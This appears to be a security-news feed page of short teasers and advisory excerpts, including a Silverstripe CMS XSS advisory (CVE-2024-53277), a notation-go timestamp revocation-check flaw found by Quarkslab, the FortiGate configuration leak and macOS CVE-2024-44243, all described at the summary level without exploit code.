#ios

Introduction Microsoft engineering teams use the Security Development Lifecycle to ensure our products are built in alignment with Microsoft’s Secure Future Initiative security principles: Secure by Design, Secure by Default, and Secure Operations. A key component of the Security Development Lifecycle is security testing, which aims to discover and mitigate security vulnerabilities before adversaries can exploit them.

FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…

The stolen firewall data is thorough but more than 2 years old now, meaning that most organizations following even basic security practices face minimal risk, hopefully.

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...

By staying vigilant, agile, and prepared, organizations can turn TDIR from a defensive strategy into a proactive enabler of security and operational excellence.

CVE-2024-44243, a critical macOS vulnerability discovered recently by Microsoft, can allow attackers to bypass Apple’s System Integrity Protection…

In some cases, form messages can contain HTML markup. This is an intentional feature, allowing links and other relevant HTML markup for the given message. Some form messages include content that the user can provide. There are scenarios in the CMS where that content doesn't get correctly sanitised prior to being included in the form message, resulting in an XSS vulnerability. ### References - https://www.silverstripe.org/download/security-releases/cve-2024-53277 ## Reported by Leo Diamat from [Bastion Security Group](http://www.bastionsecurity.co.nz/)

An insurance company is accused of unlawfully collecting, using, and selling location data from millions of people's cell phones.

This issue was identified during Quarkslab's audit of the timestamp feature. ### Summary During the timestamp signature generation, the revocation status of the certificate(s) used to generate the timestamp signature was not verified. ### Details During timestamp signature generation, notation-go did not check the revocation status of the certificate chain used by the TSA. This oversight creates a vulnerability that could be exploited through a Man-in-The-Middle attack. An attacker could potentially use a compromised, intermediate, or revoked leaf certificate to generate a malicious countersignature, which would then be accepted and stored by `notation`. ### Impact This could lead to denial of service scenarios, particularly in CI/CD environments during signature verification processes because timestamp signature would fail due to the presence of a revoked certificate(s) potentially disrupting operations.